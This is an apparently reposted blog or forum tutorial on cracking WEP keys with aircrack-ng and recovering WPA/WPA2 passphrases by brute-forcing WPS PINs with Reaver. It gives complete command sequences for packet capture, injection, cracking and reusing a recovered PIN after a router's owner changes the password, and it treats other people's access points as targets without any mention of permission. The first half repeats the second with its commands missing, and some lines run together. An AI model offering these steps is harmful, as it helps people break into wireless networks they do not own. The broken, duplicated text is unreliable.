ey HF, today i'm going to show you how to Crack WEP and WPA/WPA2-PSK passwords!
I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!
WEP Cracking
What is Aircrack-NG?
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.
How do i use this tool?
Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.
These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.
Let's Begin.
Open up a terminal and type:
This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.
Now, we need to set the wireless card in monitor mode, to do that type:
After that, type:
Quote:airodump-ng mon0
When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.
Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.
Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0
You should know start recieving DATA.
To speed up this proccess, open up another terminal and type:
After a some secondsthis should appear: When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
The password is:
Reaver
What is reaver?
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
How do i use this tool?
As said above, just follow this tutorial :)
NOTE: Reaver doesn't need any Dictionary files!
First, type:
I'll use wlan0
We need to set it the wireless card on monitor mode, so type:
Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel
To see the AP's that are vulnerable to WPS attacks, type:
If the AP is limiting you with a message saying:
If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
I usually add the: -c -S -L
When it reaches 100% it should give you some lines, the password is the one after:
You should also, remember the PIN.
Since you already have the pin, type:
I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!
WEP Cracking
What is Aircrack-NG?
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.
How do i use this tool?
Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.
These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.
Let's Begin.
Open up a terminal and type:
Quote:airmon-n
This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.
Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0
After that, type:
Quote:airodump-ng mon0
When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.
Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.
Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0
You should know start recieving DATA.
To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0After it says it was successfull, type:
Quote:aireplay-ng -3 -b [BSSID] mon0
After a some secondsthis should appear: When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.capNow, wait for some minutes and it should give you the PASSWORD!
The password is:
Quote:EF855844B288E4BB1BA9ADF14DPA2-PSK Cracking
Reaver
What is reaver?
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
How do i use this tool?
As said above, just follow this tutorial :)
NOTE: Reaver doesn't need any Dictionary files!
First, type:
Quote:airmon-ngAs said earlier, this shows you, your wireless card name.
I'll use wlan0
We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0After that, type:
Quote:airodump-ng mon0
Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel
To see the AP's that are vulnerable to WPS attacks, type:
Quote:wash -i mon0If the target AP is vulnerable, it should say:
Quote:WPS Locked: NoNow, to start the attack, type:
Quote:reaver -i mon0 -b [BSSID] -vvNow, you'll need to wait around 2-10 hours.
If the AP is limiting you with a message saying:
Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-tryingAND
If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
Quote:reaver --helpThis will show you the help menu, you can start playing with the options that you have.
I usually add the: -c -S -L
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vvThis one works great for me, so keep playing with the options untill it works!
When it reaches 100% it should give you some lines, the password is the one after:
Quote:WPS PSK: 'PASSWORD HERE'And here it is!
You should also, remember the PIN.
Quote:WPS PIN: PIN HERENow, let's say for some reason, the router's owner changed the password for his WiFi.
Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vvTutorial By Asad Rafiq
No comments:
Post a Comment
We do receive a lot of comments each day and those comments are moderated by the human being not automated robots. So, Please avoid doing spam and posting links in comments otherwise comment will not be published. We can't tolerate anymore. Thanks for understanding!